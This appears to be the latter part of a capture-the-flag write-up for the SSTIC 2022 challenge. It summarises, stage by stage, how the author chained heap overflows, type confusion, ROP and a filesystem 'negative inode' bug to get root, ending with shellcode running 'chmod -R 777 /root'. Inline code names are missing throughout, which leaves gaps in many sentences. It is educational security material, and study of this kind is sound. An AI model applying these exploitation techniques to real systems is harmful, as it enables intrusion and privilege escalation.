kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkx, ....,'... .:kOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO0O00O00000000000000 ,0000000000000
kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk' .,oxkOOOOkxl, cOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO0O0O00O0O0000000000 .;:;;;:::;:;::::::::o0000000000000
kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkd .lkOOOOOOOOOOx: .kOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO0O0O0O0000000000000 l000000000000000000000000000000000
kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk. .dOOOOOOOOOOOOOOl. cOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO0O0O00000000000000 l000000000000000000000000000000000
kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkx dOkOOOOOOOOOOOOOOc .OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO0O0O0O0000000000000 l000000000000000000000000000000000
kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkd .kOOOOOOOOOOOOOOOOx OOOOOOOOOOOOOOOOOOOOOOxdlccccccloxkOO0O0O0O0000000000000 l00000000000000000000000000000000O
kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkd 'kOOOOOOOOOOOOOOOOO OOOOOOOOOOOOOOOOOOOxc,.. .'cx0O0O000000000000000 l0000000000000000000000000000000l,
kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkx .kOOOOOOOOOOOOOOOOx .OOOOOOOOOOOOOOOOxc,. .,lk0000000000000000 l0000000000000000000000000000000,
kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk. dOOOOOOOOOOOOOOOOc cOOOOOOOOOOOOOOOo. 'k0O0000000000000 l0000000000000000000000000000000,
kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkko .dOOOOOOOOOOOOOkc .xOOOOOOOOOOOOOk;. ..;:cccc:;.. .o00000000000000 ,c:;;,',;;:cldk00000000000000000l;
kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkc .ckOOOOOOOOOOx; .xOOOOOOOOOOOOOk, .;dOOOOOOOOOOd, .xO000000000000 .;x00000000000000000
kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk; .,oxkOOOOkdc' .lOOOOOOOOOOOOOOl .cOOOOOOOOOOOOOk; 'O0O0000000000 .:O000000000000000
kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkOkc,. ......... .;oOOOOOOOOOOOOOOd .oOOOOOOOOOOOOOOOO: o000000000000 .cO0000000000000
kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkOkOd:. .,cxOOOOOOOOOOOOOOOO. .xOOOOOOOOOOOOOOOOOO; .O00000000000 ..,,;;;;,'. 'O000000000000
kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkOkkoc;. .;cxOOOOOOOOOOOOOOo lOOOOOOOOOOOOOOOOOOOx d00000000000.';coxkOO0000Okxoc,. .k00000000000
kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkx;. ..... .cOOOOOOOOOOOOO, OOOOOOOOOOOOOOOOOOOO0. c00000000000kO00000000000000000d' ,00000000000
kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkc. .,:coododlc:'. 'oOOOOOOOOOOO .lllllllllllllllllllll. ;0000000000000000000000000000000O; o0000000000
kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkc ;xOOOOOOOOOOOko' .dOOOOOOOOOx ,00O000000000000000000000000000000; .0000000000
kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkx. ;kkOOOOOOOOOOOOOx. 'OOOOOOOOOd ,000000000000000000000000000000000x O000000000
kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk' ,kOOOOOOOOOOOOOOOOd. lOOOOOOOOd ,0000000000000000000000000000000000. d000000000
kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkx kkOOOOOOOOOOOOOOOOOo .OOOOOOOOd .;;;;;;;;;;;;;;;;;;;;;;;;;;;o0000000000000000000000000000000000c l000000000
kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkl .OOOOOOOOOOOOOOOOOOOk kOOOOOOOx :OOOOOOOOOOOOOOOOOOOO0O00O0000000000000000000000000000000000000l l000000000
kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkc :OkOOOOOOOOOOOOOOOOOO xOOOOOOOO .OOOOOOOOOOOOOOOOOOOOO0O0O0000000000000000000000000000000000000: l000000000
kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkl ,OOOOOOOOOOOOOOOOOOOk kOOOOOOOO, dOOOOOOOOOOOOOOOOOOO0000O000000000000000000000000000000000000O. x000000000
kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkko kOOOOOOOOOOOOOOOOOOd OOOOOOOOOd .OOOOOOOOOOOOOOOOOOO0O0OO000000000000000000000000000000000000c O000000000
kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk :kOOOOOOOOOOOOOOOOk' 'OOOOOOOOOO' ;kOOOOOOOOOOOOOOOOO0O0O00000000000000000000000000000000000Ol ;0000000000
kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk; lOkOOOOOOOOOOOOOk; dOOOOOOOOOOx. ,kOOOOOOOOOOOOOOOOO0O0OkO00O000000OdO0000000000000000000O: O0000000000
kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkd .lkOOOOOOOOOOOOk; .kOOOOOOOOOOOc ,xOOOOOOOOOOOOOOOO0Oxl,x000000000x.;dk0000000000000000x: :00000000000
kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk: ':ldxkkkkxdc:. .oOOOOOOOOOOOOk:. .;coxkkkOOkkkxdlc;'. x000000000x ..';cllddxkkxxol:,. ;O00000000000
kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkc ..,,,'.. .dOOOOOOOOOOOOOOOo. .',,;;,,'.. x000000000x ....... .l0000000000000
kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkc,. .;dOOOOOOOOOOOOOOOOOx:. x000000000x .;d00000000000000
kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkOkko'. .:dOOOOOOOOOOOOOOOOOOOOOkl'. .,cO0O0000000k'. ':k0000000000000000
Ah, that looks like a message! To make it easier to read, I translated this into an image, using the byte values as pixel intensities:

We can easily read off the email address to complete the challenge: [email protected]
. Challenge complete!
Solution Summary
This is a quick summary of the solution; for details, consult the relevant sections of the writeup.
- Stage 1
- Stage 2
- Extract
. - Reverse the FTP server binary and identify several bugs:
- A bug that enables changing the authentication type and provoking a type confusion
- A bug that allows leaking some signatures from the HSM along with an executable address (defeating PIE)
- A large heap overflow bug
- A potential use-after-free bug
- Reverse the HSM binary to extract the signing algorithm.
- Reimplement the signing algorithm in Python.
- Develop a mathematical attack which recovers the signing key by using leaks from the signature leak bug.
- Use the attack to recover signing keys and forge a valid CERT message with higher permissions (
) and read the secret file for the flag.
- Extract
- Stage 3
- Use the type confusion bug to leak a heap pointer.
- Use the heap overflow bug to corrupt a Cert object so we can leak the contents of a GOT entry (leaking libc)
- Use libc gadgets to build a ropchain. Overwrite a function pointer on the Cert object (signed with the recovered keys) to trigger the ropchain.
- The exploit uses the ropchain to read yet another secret file, yielding the stage 3 flag.
- Stage 4
- Use another ropchain to list the contents of
and findhome_backup.tar.zz
. - Use yet another ropchain to retrieve this file, and guess that it was compressed with the provided
binary. - Reverse the
binary, mostly with static reversing, to figure out how it compresses files.- This involves disassembling and reversing a weird virtual machine where opcodes are relative program addresses.
- The program also executes 32-bit Intel code via the “Heaven’s Gate” technique to supply yet another weird virtual machine.
- Implement a decompressor which spits out the uncompressed
. - Decompress the .tar file and find the flag in
- Use another ropchain to list the contents of
- Stage 5
- Obtain the password to mount the goodfs filesystem in
. - Reverse both
to figure out how they communicate. - Get shellcode execution in the FTP server, not just ropchains, by writing to and
‘ing temporary files. - Mount the goodfs filesystem. Read a hint about
. - Reverse the filesystem driver,
, and find the missingmark_buffer_dirty
calls. - Using the missing
calls, corrupt the filesystem and obtain direct access to the contents of inode #3. - Read inode #3 to get the stage 5 flag.
- Obtain the password to mount the goodfs filesystem in
- Stage 6
- Reverse
a bit further to identify the “negative inode” vulnerability. - Examine
carefully to see how it can be attacked via targeted heap overwrites from a “negative inode” page. - Build an exploit which allocates lots of dummy memory so that the
heap will be adjacent to the goodfs disk block 0, then overwrites the heap during unmount by editing negative inodes - Use the heap overwrite to corrupt the stack in
via a stack overflow, and use this to directly execute shellcode (NX is off). - Use the shellcode to
chmod -R 777 /root
, thereby enabling access to/root/final_secret.txt
, which contains the stage 6 flag.
- Reverse
- Final Stage
- Reformat the “transmission” in
as a sequence of fixed-length lines - Read the image formed in the resulting text file (without word wrapping) to obtain the email address.
- Reformat the “transmission” in
Here’s an approximate timeline of my solution process, reconstructed via web browsing history, terminal logs, file timestamps, and Git commits. All times are local (GMT-7).
Friday April 1
- 10:21 am: During a work break, download
. - 10:24 am: Using Hachoir, extract the data of
, which turns out to just be a picture of an apple pie. - 10:36 am: Run
and identify a GZip header at offset 0x1e6200. Fail to extract the GZip starting at that offset. - 10:38 am – 10:47 am: Write the
script to extract the file from the FAT. This works and spits out a usablehidden.gz
file. - 10:50 am: Figure out it’s a
and extract it, finding the flag. - 10:51 am: Submit stage 1 flag.
- 10:56 am: Unpack initramfs. Open
in Ghidra. No time to reverse it. - 11:00 am – 6:30 pm: Work
- 3:10 pm: During a brief break, extract and decode the seccomp rules from
. - 6:30 pm – 7:00 pm: Install qemu, patch simavr so it compiles without OpenGL, and get the release package running locally.
- 9:00 pm: Resume working on SSTIC. Try getting the server binary to run outside of QEMU. Build a dummy HSM using Python’s
module to simulate a real serial device. - 9:15 pm: Start working on a client for the FTP server. Continue reversing it.
- 9:30 pm: Identify the base64 overflow bug in
and the one-null-byte overflow inhandleClientFTPServer
. - 10:08 pm: Start reversing the HSM
Saturday April 2
- 12:09 am: HSM reversing is almost done. Start reimplementing it in Python.
- 12:24 am: Finished a reimplementation of the HSM in Python. Time to sleep.
- 11:00 am: Resume work. Decide to start looking at the
binary even though I have no idea what it’s for yet. - 11:34 am: Start writing a disassembler for the weird VM inside
. - 12:33 pm: All three VM programs starting at 0x130c0 disassembled completely.
- 1:30 pm: Decide that I should focus on the FTP server for now. Research heap exploit techniques that may be applicable.
- 2:00 pm: Figure out that it’s feasible to leak signatures via the username
and start working on recovering the HSM keys from the leak. - 2:36 pm: Figure out that the HSM is implementing a simple operation in GF(264). Implement a solver in Sage.
- 3:25 pm: Exploit complete.
- 3:27 pm: Submit stage 2 flag. Start working immediately on a full exploit of the server, since I have all the bugs and can now forge certificates.
- 5:21 pm: Get ROP. Start working on a ropchain to finish the exploit.
- 5:45 pm: Start trying to read
. - 5:57 pm: Submit stage 3 flag.
- 6:16 pm: Start reversing the GoodFS pieces:
. - 6:41 pm: Extract
from the provided GoodFSdevices/sdb
file. - 9:00 pm: Go back to reversing
. - 10:16 pm: Realize I don’t know what
is. Start writing agetdents64
ropchain to list the remote filesystem. - 11:01 pm: Find
in thesensitive
directory. Start writing another ropchain to retrieve the file. - 11:49 pm: Successfully retrieve
. Realize thatzz
is a compression program – a lot more things make sense now.
Sunday April 3
- 12:05 am: Making rapid progress on reversing
and the weird VM. - 12:42 am: Figure out that literals are stored in a heap, and infer that this is an algorithm for building a Huffman tree.
- 1:20 am: Start writing a
parser/decompressor. - 1:59 am: Finish parsing the literals array.
- 2:24 am: Discover the “heaven’s gate” construct that switches into 32-bit mode. Start disassembling the 32-bit “VM”.
- 2:49 am: Disassemble enough of the 32-bit VM to determine that it’s just outputting the match literals table, and extract the relevant Huffman parameters.
- 3:13 am: Complete the decompressor and recover
. - 3:15 am: Submit stage 4 flag.
- 3:48 am: In order to mount the goodfs, I’ll need shellcode to interact with the
. Start modifying my exploit to provide shellcode execution. - 4:20 am: Write a program to run shellcode directly in my local QEMU so we don’t need to keep exploiting the FTP server, with the exact same seccomp configuration as the real FTP server.
- 4:50 am: Get shellcode execution working remotely. Start reversing
. - 5:47 am: Write a stager so we can load even more shellcode.
- 6:30 am: Sleep.
- 12:15 pm: Back at it. Give myself a root shell in the local QEMU via a netcat socket.
- 12:49 pm: Switch to using IDA for
because Ghidra is having trouble with some of the DWARF data type definitions. Continue reversing. - 2:38 pm: Start putting together an exploit to abuse the missing
calls. - 3:14 pm: Realize that I need to change the time on a parent directory to prevent
call from propagating anmtime
change to the root inode and updating it. - 3:25 pm: Complete the exploit.
- 3:27 pm: Exploit works remotely, secret file
extracted. - 3:37 pm: Submit stage 5 flag.
- 4:11 pm: Continuing to find more bugs and figure out the next exploit. Can we plant a binary that will be called as root? (e.g. setuid,
, or binary called by themounter_server
?) - 6:14 pm: Continuing to figure out what to do. Maybe we can corrupt the filesystem badly enough to trigger a bug in VFS?
- 7:41 pm: Gain the ability to write directory entries directly (have a file and a directory both sharing the same block storage).
- 8:26 pm: Just doing some refactoring/cleanup to make future exploits easier to write
- 10:00 pm: Can we call
in 32-bit mode from shellcode? (No:libseccomp
checks the architecture). - 10:52 pm: Manage to get some useless kernel crashes: one NULL pointer deref from calling
on a file after it’s been corrupted out of the parent directory (so it’s in the dentry cache but not in the goodfs block), and a second weird crash from trying to switch to 32-bit mode (supervisor write access in user mode
). - 11:30 pm: Sleep; work next morning.
Over the next four days, I occasionally poke at the problem when I get time away from work and in the evenings, researching various kernel bugs and exploits for bad filesystems. Unfortunately, most such exploits assume you can make setuid
root binaries, but our inability to execve
precludes all of these. At some point, I did think about exploring negative inodes, but made an incorrect assumption about the C division operator and did not believe it was exploitable. I also got a good kernel debugging setup going.
Friday April 8
On this day, I had several meetings throughout the day, as well as teaching, so I was mostly coding during breaks in my day from 9:00am – 4:30pm.
- 11:00 am: The SSTIC organizers release a hint.
- 11:08 am: Dump the new secret file and read the “negative inode” hint. Immediately realize that I’ve probably misunderstood the inode reading code.
- 11:17 am: Identify the weakness in
that permits a write to the page immediately preceding thebuffer_head
page. - 11:38 am: Exploring negative inodes.
- 12:38 pm: Augmented my shellcode program to show all
output for a given file, so we can see the data leaked from the negative inode page. - 1:26 pm: Augmented my shellcode to dump all valid negative inodes, while also watching
calls in GDB. - 3:31 pm: Use the memory leak in
to reliably getmounter_server
‘s latest heap allocation to come from the “negative inode” page. It’s now clear that we can exploitmounter_server
by corrupting the heap-allocated strings when writing back negative inodes. - 5:47 pm: Start exploring ROP gadgets in
. Find the perfect gadget:jmp rdi
at 0x004016ed, to be used to overwrite the syslog function pointer on the stack. This works great because the heap is executable. - 6:06 pm: Patch
so it performs fewer checks, to make the exploit easy to trigger and debug. - 7:13 pm: Start writing the shellcode that will be executed in
. The initial approach was to execute a shell connected to the FTP server’s socket, but that did not work because the busybox shell won’t redirect to/proc/<pid>/fd/5
when that’s connected to a socket. - 7:50 pm: Rewrite the shellcode to just execute
chmod -R 777 /root
instead. - 7:53 pm: Got the exploit working locally.
- 8:02 pm: Got the exploit working remotely!
- 8:06 pm: Submit stage 6 flag.
- 8:10 pm: Try to decode the weird message. Realize it’s truncated, and try to dump the whole file.
- 8:21 pm: Recover the entire
file. - 8:25 pm: Reformat the text as lines and recover the image of the email address.
- 8:26 pm: Email
[email protected]
to complete the challenge.
This year’s challenge was fantastic. I especially loved the incredible subtlety of the “negative inode” bug, and how it could enable the compromise of the root mounter_server
process. The range of different skills and concepts required for this competition continue to be a great learning opportunity, and I thoroughly enjoyed every step. I look forward to next year’s edition!
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